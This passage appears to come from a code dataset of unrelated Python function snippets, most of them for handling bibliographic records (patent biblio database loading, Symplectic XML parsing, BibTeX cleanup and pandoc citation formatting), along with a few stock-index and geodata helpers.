'bibo:%s'%cOrg['identifier']\n\n #cOrgAttrs = [\n # (\"prov:type\", 'gcis:organization'),\n # (\"prov:label\", cOrg['name']),\n # (\"prov:location\", cOrg['uri']),\n # (\"gcis:organization_type_identifier\", cOrg['organization_type_identifier']),\n # 
(\"gcis:country_code\", cOrg['country_code']),\n # ]\n #doc.entity(cOrgID, cOrgAttrs)\n #doc.hadMember(orgID, cOrgID)\n #for parent in org['parents']:\n # pOrgURI = parent['organization']\n # rel = parent['relationship']\n # pOrg = next(o for o in orgList if o['uri'] == pOrgURI)\n # pOrgID = 'bibo:%s'%pOrg['identifier']\n # doc.hadMember(pOrgID, orgID)\n\n prov_json = json.loads(doc.serialize())\n\n return prov_json", "def mezclar_bolsa(self):", "def snippetList(requeset, format = None):", "def load_biblio(self, file_name, preload_ids=False, chunksize=1000):\n\n logger.info( \"Loading biblio data from [{}], with chunk size {}. Preload IDs? {}\".format(file_name, chunksize, preload_ids) )\n\n input_file = codecs.open(file_name, 'r', 'utf-8')\n biblio = json.load(input_file)\n\n sql_alc_conn = self.db.connect()\n db_api_conn = sql_alc_conn.connection\n\n if (\"cx_oracle\" in str(self.db.dialect)):\n title_ins = DBBatcher(db_api_conn, 'insert into schembl_document_title (schembl_doc_id, lang, text) values (:1, :2, :3)')\n classes_ins = DBBatcher(db_api_conn, 'insert into schembl_document_class (schembl_doc_id, class, system) values (:1, :2, :3)')\n else:\n title_ins = DBBatcher(db_api_conn, 'insert into schembl_document_title (schembl_doc_id, lang, text) values (%s, %s, %s)')\n classes_ins = DBBatcher(db_api_conn, 'insert into schembl_document_class (schembl_doc_id, class, system) values (%s, %s, %s)')\n\n\n ########################################################################\n # STEP 1: If overwriting, find extant docs and pre-populate doc ID map #\n ########################################################################\n\n extant_docs = set()\n\n if self.overwrite or preload_ids:\n\n for chunk in chunks(biblio, chunksize):\n\n # Loop over all biblio entries in this chunk\n doc_nums = set()\n for bib in chunk[1]:\n\n input_pubnum = self._extract_pubnumber(bib)\n\n # Early return: don't bother querying if we already have an ID\n if input_pubnum in self.doc_id_map:\n extant_docs.add( input_pubnum ) \n continue\n\n doc_nums.add(input_pubnum)\n\n if len(doc_nums) == 0:\n continue\n\n self._fill_doc_id_map(doc_nums, sql_alc_conn, extant_docs)\n\n logger.info( \"Discovered {} existing IDs for {} input documents\".format( len(extant_docs),len(biblio)) )\n\n\n ########################################################\n # STEP 2: Main biblio record processing loop (chunked) #\n ########################################################\n\n for chunk in chunks(biblio, chunksize):\n\n logger.debug( \"Processing {} biblio records, up to index {}\".format(len(chunk[1]), chunk[0]) )\n\n new_doc_mappings = dict() # Collection IDs for totally new document \n overwrite_docs = [] # Document records for overwriting\n duplicate_docs = set() # Set of duplicates to read IDs for\n known_count = 0 # Count of known documents\n\n new_titles = []\n new_classes = [] \n\n doc_insert_time = 0\n\n\n transaction = sql_alc_conn.begin()\n\n for bib in chunk[1]:\n\n ########################################\n # STEP 2.1 Extract core biblio records #\n ########################################\n\n family_id, pubdate, pubnumber, assign_applic = self._extract_core_biblio(bib)\n\n life_sci_relevant = self._extract_life_sci_relevance(bib)\n\n\n ####################################################\n # Step 2.2 Overwrite or Insert the document record #\n ####################################################\n\n if pubnumber in extant_docs:\n\n known_count += 1\n\n if self.overwrite:\n # Create an overwrite record\n doc_id = 
self.doc_id_map[pubnumber] \n overwrite_docs.append({\n 'extant_id' : doc_id,\n 'new_published' : pubdate,\n 'new_family_id' : family_id,\n 'new_life_sci_relevant' : life_sci_relevant,\n 'new_assign_applic' : assign_applic })\n else:\n # The document is known, and we're not overwriting: skip\n continue\n\n else:\n \n # Create a new record for the document\n record = {\n 'scpn' : pubnumber,\n 'published' : pubdate,\n 'family_id' : family_id,\n 'assign_applic' : assign_applic,\n 'life_sci_relevant' : int(life_sci_relevant) }\n \n try:\n\n start = time.time()\n result = sql_alc_conn.execute( self.docs.insert(), record )\n end = time.time()\n\n doc_insert_time += (end-start)\n\n except Exception, exc:\n\n if exc.__class__.__name__ != \"IntegrityError\":\n raise\n\n elif self.allow_document_dups:\n\n # It's an integrity error, and duplicates are allowed.\n known_count += 1\n duplicate_docs.add(pubnumber)\n\n # Reset transaction\n transaction.commit()\n transaction = sql_alc_conn.begin()\n continue \n\n else:\n\n raise RuntimeError(\n \"An Integrity error was detected when inserting document {}. This \"\\\n \"indicates insertion of an existing document, but duplicates have been disallowed\".format(pubnumber))\n\n\n doc_id = result.inserted_primary_key[0] # Single PK\n new_doc_mappings[pubnumber] = doc_id\n\n self._extract_detailed_biblio(bib, doc_id, new_classes, new_titles, pubnumber)\n\n # Commit the new document records, then update the in-memory mapping with the new IDs\n transaction.commit()\n self.doc_id_map.update(new_doc_mappings)\n\n logger.info(\"Processed {} document records: {} new, {} duplicates. DB insertion time = {:.3f}\".format( len(chunk[1]), len(new_doc_mappings), known_count, doc_insert_time))\n\n\n ########################################################\n # STEP 2.2: Deal with document overwrites / duplicates #\n ########################################################\n\n if len(overwrite_docs) > 0:\n\n transaction = sql_alc_conn.begin()\n\n # Update the master record for the document that's being overwritten\n stmt = self.docs.update().\\\n where(self.docs.c.id == bindparam('extant_id')).\\\n values(published=bindparam('new_published'), \n family_id=bindparam('new_family_id'), \n life_sci_relevant=bindparam('new_life_sci_relevant'),\n assign_applic=bindparam('new_assign_applic'))\n\n sql_alc_conn.execute(stmt, overwrite_docs)\n\n # Clean out ALL other references to the document, for re-insertion\n delete_ids = [record['extant_id'] for record in overwrite_docs]\n\n stmt = self.titles.delete().where( self.titles.c.schembl_doc_id.in_( delete_ids ) )\n sql_alc_conn.execute( stmt )\n\n stmt = self.classes.delete().where( self.classes.c.schembl_doc_id.in_( delete_ids ) )\n sql_alc_conn.execute( stmt )\n\n stmt = self.chem_mapping.delete().where( self.chem_mapping.c.schembl_doc_id.in_( delete_ids ) )\n sql_alc_conn.execute( stmt )\n\n transaction.commit()\n\n logger.info(\"Overwrote {} duplicate documents (master doc record updated, all other references deleted)\".format(len(overwrite_docs)))\n\n if len(duplicate_docs) > 0:\n self._fill_doc_id_map(duplicate_docs, sql_alc_conn)\n\n logger.info(\"Read {} IDs for duplicate documents\".format(len(duplicate_docs)))\n\n ########################################################\n # STEP 2.3: Bulk insertion of titles / classifications #\n ########################################################\n\n\n # Bulk insert titles and classification\n if self.load_titles:\n title_ins.execute(new_titles)\n logger.debug(\"Insertion of {} titles 
completed\".format(len(new_titles)) )\n\n if self.load_classifications:\n classes_ins.execute(new_classes)\n logger.debug(\"Insertion of {} classification completed\".format(len(new_classes)) )\n\n # END of main biblio processing loop\n\n # Clean up resources\n title_ins.close()\n classes_ins.close()\n sql_alc_conn.close()\n input_file.close()\n\n logger.info(\"Biblio import completed\" )", "def cv_list(self):\n\n mystr = \"\"\n for p in self.mypapers:\n mystr += f\"{p.title[0]}\\n\"\n if len(p.author) > 12:\n a = f\"{p.author[0]} et al. \"\n elif len(p.author) > 2:\n a = \", \".join(p.author[:-1]) + f\" & {p.author[-1]} \"\n elif len(p.author) == 2:\n a = f\"{p.author[0]} & {p.author[1]} \"\n else:\n a = f\"{p.author[0]} \"\n\n mystr += f\"{a}\"\n mystr += f\"{p.year}, {p.pub}\"\n if p.volume is not None:\n mystr += f\", {p.volume}\"\n if p.issue is not None:\n mystr += f\", {p.issue}\"\n if p.page is not None:\n mystr += f\", {p.page[0]}\"\n mystr += \"\\n\\n\"\n return mystr", "def get_bibtex(self):\n\n return self._bibtexs", "def get_compo_list(self):\n super(self.__class__, self).get_compo_list()\n link = 'https://en.wikipedia.org/wiki/Dow_Jones_Industrial_Average'\n params={'Symbol':2, 'Name':0, 'Sector':3, 'Industry':3}\n self.components = get_index_components_from_wiki(link, params)\n # insert CIK\n ciks = self.update_ciks(updateall=True)\n self.components = self.components.join(ciks)\n return self.components", "def loeschen(self):\r\n loeschen=self.REQUEST['loeschen']\r\n tit=''\r\n i=0\r\n j=0\r\n index=[]\r\n cursor=[]\r\n for x in self.objectValues('Image'):\r\n if str(x.id())[0:6] not in index:\r\n index.append(str(x.id())[0:6]) \r\n cursor.append([str(x.id())[0:6],str(x.title),[str(x.id())]])\r\n if str(x.id())[0:6]==loeschen:\r\n tit=str(x.title)\r\n j=i\r\n i=i+1\r\n else:\r\n cursor[-1][2].append(str(x.id()))\r\n #for val in cursor[j][2]:\r\n #self._delOb(self, id=str(val))\r\n #delet=delet+str(val)+' '\r\n self.manage_delObjects(ids=cursor[j][2])\r\n return tit+' gel&ouml;scht !'", "def __createBiblioObjFromBiblioElement(biblio_element, publication_object):\r\n #description \r\n #++++++BIBLIOGRAPHIC-RECORD++++++\r\n #check Bibliographical-record Element\r\n if biblio_element is None:\r\n return\r\n #make blank Biblio Object\r\n biblio_object = BibliographicRecord()\r\n #Bibliographic-record sub-elements (used to read XML)\r\n if biblio_element is not None:\r\n urls = biblio_element.find(SYMPLECTIC_NAMESPACE + 'urls')\r\n bibliometric_data_element = biblio_element.find(SYMPLECTIC_NAMESPACE + 'bibliometric-data')\r\n bibliographic_data_element = biblio_element.find(SYMPLECTIC_NAMESPACE + 'bibliographic-data')\r\n if bibliographic_data_element is not None:\r\n native_element = bibliographic_data_element.find(SYMPLECTIC_NAMESPACE + 'native')\r\n if native_element is not None:\r\n authors_subtree = native_element.find(SYMPLECTIC_NAMESPACE + 'authors')\r\n keywords_subtree = native_element.find(SYMPLECTIC_NAMESPACE + 'keywords')\r\n #bibliographic-record attribs\r\n if biblio_element is not None:\r\n biblio_object.data_source = biblio_element.get('data-source','')\r\n biblio_object.id_at_source = biblio_element.get('id-at-source','')\r\n biblio_object.verification_status = SymplecticXMLPubs.__getElementText( biblio_element.find(SYMPLECTIC_NAMESPACE + 'verification-status') ) \r\n #bibliometric data\r\n if bibliometric_data_element is not None:\r\n biblio_object.times_cited = SymplecticXMLPubs.__getElementText( bibliometric_data_element.find(SYMPLECTIC_NAMESPACE + 'times-cited') 
)\r\n biblio_object.reference_count = SymplecticXMLPubs.__getElementText( bibliometric_data_element.find(SYMPLECTIC_NAMESPACE + 'reference-count') )\r\n #native\r\n if native_element is not None:\r\n biblio_object.abstract = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'abstract') )\r\n biblio_object.associated_authors = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'associated-authors') )\r\n biblio_object.awarded_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'awarded-date') )\r\n biblio_object.begin_page = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'begin-page') )\r\n biblio_object.book_author_type = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'book-author-type') )\r\n biblio_object.commissioning_body = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'commissioning-body') )\r\n biblio_object.confidential = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'confidential') )\r\n biblio_object.doi = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'doi') )\r\n biblio_object.edition = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'edition') )\r\n biblio_object.editors = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'editors') )\r\n biblio_object.end_page = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'end-page') )\r\n biblio_object.filed_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'filed-date') )\r\n biblio_object.fnish_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'fnish-date') )\r\n biblio_object.isbn_10 = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'isbn-10') )\r\n biblio_object.isbn_13 = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'isbn-13') )\r\n biblio_object.issn = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'issn') )\r\n biblio_object.issue = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'issue') )\r\n biblio_object.journal = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'journal') )\r\n biblio_object.journal_article_type = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'journal_article_type') )\r\n biblio_object.language = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'language') )\r\n biblio_object.location = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'location') )\r\n biblio_object.medium = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'medium') )\r\n biblio_object.name_of_conference = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'name-of-conference') )\r\n biblio_object.notes = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'notes') )\r\n biblio_object.number = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'number') )\r\n biblio_object.number_of_pages = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'number-of-pages') )\r\n biblio_object.number_of_pieces = SymplecticXMLPubs.__getElementText( 
native_element.find(SYMPLECTIC_NAMESPACE + 'number-of-pieces') )\r\n biblio_object.parent_title = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'parent-title') )\r\n biblio_object.patent_number = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'patent-number') )\r\n biblio_object.patent_status = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'patent-status') )\r\n biblio_object.pii = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'pii') )\r\n biblio_object.place_of_publication = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'place_of_publication') )\r\n biblio_object.publication_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'publication-date') )\r\n biblio_object.publication_status = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'publication-status') )\r\n biblio_object.publisher = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'publisher') )\r\n biblio_object.series = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'series') )\r\n biblio_object.start_date = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'start-date') )\r\n biblio_object.title = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'title') )\r\n biblio_object.version = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'version') )\r\n biblio_object.volume = SymplecticXMLPubs.__getElementText( native_element.find(SYMPLECTIC_NAMESPACE + 'volume') )\r\n #authors\r\n if authors_subtree is not None:\r\n biblio_object.authors = ''\r\n author_list = []\r\n for author_element in authors_subtree.getchildren():\r\n name = SymplecticXMLPubs.__getElementText(author_element.find(SYMPLECTIC_NAMESPACE + 'name'))\r\n initials = SymplecticXMLPubs.__getElementText(author_element.find(SYMPLECTIC_NAMESPACE + 'initials'))\r\n author_list.append( unicode(name) + ' ' + unicode(initials) )\r\n for author in author_list:\r\n biblio_object.authors = biblio_object.authors + author + ', '\r\n #derived authors\r\n biblio_object.number_of_authors = len(author_list)\r\n if len(author_list) > 0:\r\n biblio_object.first_author = author_list[0]\r\n if len(author_list) > 1:\r\n biblio_object.last_author = author_list[-1] \r\n #keywords\r\n if keywords_subtree is not None:\r\n biblio_object.keywords = ''\r\n for keyword_element in keywords_subtree.getchildren():\r\n biblio_object.keywords = biblio_object.keywords + '|' + unicode(keyword_element.text)\r\n #link bibliographic-record object and passed-in publication object\r\n biblio_object.publication = publication_object\r\n #save\r\n biblio_object.save()\r\n #++++++URLS++++++\r\n #delete all existing URLs for this biblio-record\r\n biblio_object.urls.all().delete()\r\n #URL elements are held in a subtree\r\n url_subtree = biblio_element.find(SYMPLECTIC_NAMESPACE + 'urls')\r\n #check if any url elements in subtree\r\n if url_subtree is None or len(url_subtree) < 1:\r\n return\r\n #for each url element in subtree\r\n for url_element in url_subtree.getchildren():\r\n SymplecticXMLPubs.__createURLObjFromURLElement(url_element, biblio_object)", "def add_library(self):\n library = self.new_section('The Library')\n books = self.wiki('the-library')._soup(class_='boxbook')\n template = (\n '<div class=\"book-title\">{}</div>'\n '<div 
class=\"book-description\">{}</div>')\n for b in books:\n title = b.find(class_='booktitle').string\n description = b.find(class_='boxleft')('div')[0].text.strip()\n excerpts = [self.wiki.site + a['href']\n for a in b.find(class_='boxright')('a')]\n if title == 'The Journal of Aframos Longjourney':\n links = self.wiki(excerpts[1])._soup.select('#page-content a')\n links = [\n 'http://wanderers-library.wikidot.com/' +\n l['href'].split('/')[-1] for l in links]\n excerpts = [excerpts[0]] + links\n book = self.add_page(\n title, template.format(title, description), library)\n for url in excerpts:\n self.add_url(url, book)", "def get_bibtex(self):\n url=\"http://www.biomedcentral.com/download/citation\"\n parameters={'citation':'on', \n 'result-selection':'THIS_PAGE',\n 'suplements': 'false',\n 'citationType':'BIBTEX_WITH_ABSTRACT',\n 'articleIdThisPage':self.article_ids\n }\n data=urllib.urlencode(parameters)\n self.bibtex=urllib2.urlopen(url,data)", "def add_ref(doc_name, bib_name, keep_label=False, slides=False):\n bib_path = bib_name # os.path.join(static_path, \"tex\", bib_name)\n if not slides:\n keep_label = True\n with open(doc_name, \"r\") as f:\n _file = f.read()\n # find citations\n match = re.findall(r\"\\[@.*?\\]\", _file)\n references = []\n # print(match)\n for cit in match:\n tmp_cite_html = tempfile.NamedTemporaryFile(suffix=\".html\", delete=True)\n tmp = tempfile.NamedTemporaryFile(suffix=\".md\", delete=True)\n with open(tmp.name, \"w\") as md_file:\n # Open the file for writing.\n md_file.write(cit)\n\n pandoc_command = [\n \"pandoc\",\n \"-C\",\n tmp.name,\n \"--bibliography\",\n bib_path,\n \"--csl\",\n \"./templates/my-csl.csl\",\n \"-o\",\n tmp_cite_html.name,\n ]\n if not slides:\n for tag in [\"--metadata\", \"link-citations=true\"]:\n pandoc_command.append(tag)\n output = subprocess.check_output(\n pandoc_command, stderr=subprocess.STDOUT\n ).decode(\"utf-8\")\n print(output.rstrip())\n tmp.close()\n with open(tmp_cite_html.name, \"r\") as cite_html:\n # Open the file for writing.\n cit_new = cite_html.read()\n # print(cit_new)\n if not keep_label:\n # remove first line\n cit_new = \"\\n\".join(cit_new.splitlines()[1:])\n else:\n lines = cit_new.splitlines()\n # remove the <p> tags\n lines[0] = lines[0][3:-4]\n cit_new = \"\\n\".join(lines)\n if slides:\n _file = _file.replace(cit, cit_new)\n else:\n _file = _file.replace(cit, lines[0])\n # collect the references\n references.append(\"<p>\")\n references.append(\"\\n\".join(lines))\n references.append(\"</p>\")\n # paste_refs_end()\n tmp_cite_html.close()\n if slides:\n with open(doc_name, \"w\") as f:\n f.write(_file)\n if not slides:\n if references == []:\n _file=clean_html_refs(_file)\n else:\n _file = _file.replace(\"<bibliography-placeholder>\", \"\\n\".join(references))\n with open(doc_name, \"w\") as f:\n f.write(_file)\n return", "def mr2bib(id_list):\n d = mr2bib_dict(id_list)\n l = []\n for id in id_list:\n try:\n l.append(d[id])\n except:\n l.append(ReferenceErrorInfo(\"Not found\", id))\n\n return l", "def _FindBibEntries(self):\n bibs = \" \".join(glob.glob(\"*.bib\"))\n cat_process = subprocess.Popen(shlex.split(\"cat %s\" % bibs),\n stdout=subprocess.PIPE)\n grep_process = subprocess.Popen(shlex.split(\"grep ^@\"),\n stdin=cat_process.stdout,\n stdout=subprocess.PIPE)\n cat_process.stdout.close()\n grep2_process = subprocess.Popen(shlex.split(\"grep -vi @string\"),\n stdin=grep_process.stdout,\n stdout=subprocess.PIPE)\n grep_process.stdout.close()\n\n lines = grep2_process.communicate()[0]\n\n ret = 
[]\n for l in lines.split(\"\\n\"):\n ret.append(responses.BuildCompletionData(\n re.sub(r\"@([A-Za-z]*)\\s*{\\s*([^,]*),.*\", r\"\\2\", l)\n )\n )\n return ret", "def load_geodata_containers(subsectie=None):\n if os.path.isfile(\"data/shp/Inzameling_huisvuil_080520.shp\"):\n source = gpd.read_file('data/shp/Inzameling_huisvuil_080520.shp')\n elif os.path.isfile(\"../data/shp/Inzameling_huisvuil_080520.shp\"):\n source = gpd.read_file('../data/shp/Inzameling_huisvuil_080520.shp')\n source = source[source['aanbiedwij'] ==\n 'Breng uw restafval naar een container voor restafval.']\n if subsectie:\n source = source[source['sdcode'].isin(list(subsectie))]\n return list(source.geometry)", "def parse_bib_from_list(filename):\n\tentry_regex = r\"TITEL: .*\\s*AUTOR: .*\"\n\tparse_func = make_parse_func(r\"AUTOR: (.*)\", r\"TITEL: (.*)\", None)\n\treturn parse_bib(filename, entry_regex, parse_func)", "def getAuthors(self): #$NON-NLS-1$\r", "def from_bibkey(glottocode, bibkey):\n\tGLOTTOLOG_PATH = path.expanduser('~/Documents/glottolog-4.0')\n\n\tfrom pyglottolog import Glottolog\n\tg = Glottolog(GLOTTOLOG_PATH)\n\n\tlanguoid = g.languoid(glottocode)\t\n\tref = [x for x in languoid.sources if x.key == bibkey]\n\tif not ref:\n\t\traise Exception('Reference not found')\n\n\tsource = ref[0].get_source(g)\n\treturn source.fields", "def get_kritis(self, kriti_list):\n self.kritis = [[k.name, k.composer, k.link] for k in kriti_list if \n k.raga == self.name]", "def list_genomes():\n genome_list = yaml.load(open(script_dir + \"/utils/genomes.yaml\",\"r\"))\n print(\"\")\n print(\"\\033[1m%-30s\\t%-30s\\033[0m\" % (\"Reference Name\", \"Location\"))\n for k,v in genome_list.items():\n print(\"%-30s\\t%-30s\" % (k, v))\n print(\"\")", "def format_bib_entry(e: BibDocument):\n if e.bibtex is not None:\n b = e.bibtex\n s = fix_string(b.get('title', b.get('ID', '?'))) + '\\n'\n s += format_author(b.get('author', b.get('editor', '?'))) + ' ' + b.get('year', '')\n if len(e.filepaths) > 0:\n s += ' [PDF]'\n return s\n else:\n return e.relpath()", "def main(bib_fpath=None):\n\n if bib_fpath is None:\n bib_fpath = 'My Library.bib'\n\n # DEBUG = ub.argflag('--debug')\n # Read in text and ensure ascii format\n dirty_text = ut.readfrom(bib_fpath)\n\n from fixtex.fix_tex import find_used_citations, testdata_fpaths\n\n if exists('custom_extra.bib'):\n extra_parser = bparser.BibTexParser(ignore_nonstandard_types=False)\n parser = bparser.BibTexParser()\n ut.delete_keys(parser.alt_dict, ['url', 'urls'])\n print('Parsing extra bibtex file')\n extra_text = ut.readfrom('custom_extra.bib')\n extra_database = extra_parser.parse(extra_text, partial=False)\n print('Finished parsing extra')\n extra_dict = extra_database.get_entry_dict()\n else:\n extra_dict = None\n\n #udata = dirty_text.decode(\"utf-8\")\n #dirty_text = udata.encode(\"ascii\", \"ignore\")\n #dirty_text = udata\n\n # parser = bparser.BibTexParser()\n # bib_database = parser.parse(dirty_text)\n # d = bib_database.get_entry_dict()\n\n print('BIBTEXPARSER LOAD')\n parser = bparser.BibTexParser(ignore_nonstandard_types=False,\n common_strings=True)\n ut.delete_keys(parser.alt_dict, ['url', 'urls'])\n print('Parsing bibtex file')\n bib_database = parser.parse(dirty_text, partial=False)\n print('Finished parsing')\n\n bibtex_dict = bib_database.get_entry_dict()\n old_keys = list(bibtex_dict.keys())\n new_keys = []\n for key in ub.ProgIter(old_keys, label='fixing keys'):\n new_key = key\n new_key = new_key.replace(':', '')\n new_key = new_key.replace('-', '_')\n new_key = 
re.sub('__*', '_', new_key)\n new_keys.append(new_key)\n\n # assert len(ut.find_duplicate_items(new_keys)) == 0, 'new keys created conflict'\n assert len(ub.find_duplicates(new_keys)) == 0, 'new keys created conflict'\n\n for key, new_key in zip(old_keys, new_keys):\n if key != new_key:\n entry = bibtex_dict[key]\n entry['ID'] = new_key\n bibtex_dict[new_key] = entry\n del bibtex_dict[key]\n\n # The bibtext is now clean. Print it to stdout\n #print(clean_text)\n verbose = None\n if verbose is None:\n verbose = 1\n\n # Find citations from the tex documents\n key_list = None\n if key_list is None:\n cacher = ub.Cacher('texcite1', enabled=0)\n data = cacher.tryload()\n if data is None:\n fpaths = testdata_fpaths()\n key_list, inverse = find_used_citations(fpaths, return_inverse=True)\n # ignore = ['JP', '?', 'hendrick']\n # for item in ignore:\n # try:\n # key_list.remove(item)\n # except ValueError:\n # pass\n if verbose:\n print('Found %d citations used in the document' % (len(key_list),))\n data = key_list, inverse\n cacher.save(data)\n key_list, inverse = data\n\n # else:\n # key_list = None\n\n unknown_pubkeys = []\n debug_author = ub.argval('--debug-author', default=None)\n # ./fix_bib.py --debug_author=Kappes\n\n if verbose:\n print('Fixing %d/%d bibtex entries' % (len(key_list), len(bibtex_dict)))\n\n # debug = True\n debug = False\n if debug_author is not None:\n debug = False\n\n known_keys = list(bibtex_dict.keys())\n missing_keys = set(key_list) - set(known_keys)\n if extra_dict is not None:\n missing_keys.difference_update(set(extra_dict.keys()))\n\n if missing_keys:\n print('The library is missing keys found in tex files %s' % (\n ub.repr2(missing_keys),))\n\n # Search for possible typos:\n candidate_typos = {}\n sedlines = []\n for key in missing_keys:\n candidates = ut.closet_words(key, known_keys, num=3, subset=True)\n if len(candidates) > 1:\n top = candidates[0]\n if ut.edit_distance(key, top) == 1:\n # \"sed -i -e 's/{}/{}/g' *.tex\".format(key, top)\n import os\n replpaths = ' '.join([relpath(p, os.getcwd()) for p in inverse[key]])\n sedlines.append(\"sed -i -e 's/{}/{}/g' {}\".format(key, top, replpaths))\n candidate_typos[key] = candidates\n print('Cannot find key = %r' % (key,))\n print('Did you mean? 
%r' % (candidates,))\n\n print('Quick fixes')\n print('\\n'.join(sedlines))\n\n # group by file\n just = max([0] + list(map(len, missing_keys)))\n missing_fpaths = [inverse[key] for key in missing_keys]\n for fpath in sorted(set(ub.flatten(missing_fpaths))):\n # ut.fix_embed_globals()\n subkeys = [k for k in missing_keys if fpath in inverse[k]]\n print('')\n ut.cprint('--- Missing Keys ---', 'blue')\n ut.cprint('fpath = %r' % (fpath,), 'blue')\n ut.cprint('{} | {}'.format('Missing'.ljust(just), 'Did you mean?'), 'blue')\n for key in subkeys:\n print('{} | {}'.format(\n ut.highlight_text(key.ljust(just), 'red'),\n ' '.join(candidate_typos[key]))\n )\n\n # for key in list(bibtex_dict.keys()):\n\n if extra_dict is not None:\n # Extra database takes precidence over regular\n key_list = list(ut.unique(key_list + list(extra_dict.keys())))\n for k, v in extra_dict.items():\n bibtex_dict[k] = v\n\n full = ub.argflag('--full')\n\n for key in key_list:\n try:\n entry = bibtex_dict[key]\n except KeyError:\n continue\n self = BibTexCleaner(key, entry, full=full)\n\n if debug_author is not None:\n debug = debug_author in entry.get('author', '')\n\n if debug:\n ut.cprint(' --- ENTRY ---', 'yellow')\n print(ub.repr2(entry, nl=1))\n\n entry = self.fix()\n # self.clip_abstract()\n # self.shorten_keys()\n # self.fix_authors()\n # self.fix_year()\n # old_pubval = self.fix_pubkey()\n # if old_pubval:\n # unknown_pubkeys.append(old_pubval)\n # self.fix_arxiv()\n # self.fix_general()\n # self.fix_paper_types()\n\n if debug:\n print(ub.repr2(entry, nl=1))\n ut.cprint(' --- END ENTRY ---', 'yellow')\n bibtex_dict[key] = entry\n\n unwanted_keys = set(bibtex_dict.keys()) - set(key_list)\n if verbose:\n print('Removing unwanted %d entries' % (len(unwanted_keys)))\n ut.delete_dict_keys(bibtex_dict, unwanted_keys)\n\n if 0:\n d1 = bibtex_dict.copy()\n full = True\n for key, entry in d1.items():\n self = BibTexCleaner(key, entry, full=full)\n pub = self.publication()\n if pub is None:\n print(self.entry['ENTRYTYPE'])\n\n old = self.fix_pubkey()\n x1 = self._pubval()\n x2 = self.standard_pubval(full=full)\n # if x2 is not None and len(x2) > 5:\n # print(ub.repr2(self.entry))\n\n if x1 != x2:\n print('x2 = %r' % (x2,))\n print('x1 = %r' % (x1,))\n print(ub.repr2(self.entry))\n\n # if 'CVPR' in self.entry.get('booktitle', ''):\n # if 'CVPR' != self.entry.get('booktitle', ''):\n # break\n if old:\n print('old = %r' % (old,))\n d1[key] = self.entry\n\n if full:\n d1 = bibtex_dict.copy()\n\n import numpy as np\n import pandas as pd\n df = pd.DataFrame.from_dict(d1, orient='index')\n\n paged_items = df[~pd.isnull(df['pub_accro'])]\n has_pages = ~pd.isnull(paged_items['pages'])\n print('have pages {} / {}'.format(has_pages.sum(), len(has_pages)))\n print(ub.repr2(paged_items[~has_pages]['title'].values.tolist()))\n\n entrytypes = dict(list(df.groupby('pub_type')))\n if False:\n # entrytypes['misc']\n g = entrytypes['online']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n entrytypes['book']\n entrytypes['thesis']\n g = entrytypes['article']\n g = entrytypes['incollection']\n g = entrytypes['conference']\n\n def lookup_pub(e):\n if e == 'article':\n return 'journal', 'journal'\n elif e == 'incollection':\n return 'booksection', 'booktitle'\n elif e == 'conference':\n return 'conference', 'booktitle'\n return None, None\n\n for e, g in entrytypes.items():\n print('e = %r' % (e,))\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n if 'pub_full' in g.columns:\n place_title = g['pub_full'].tolist()\n 
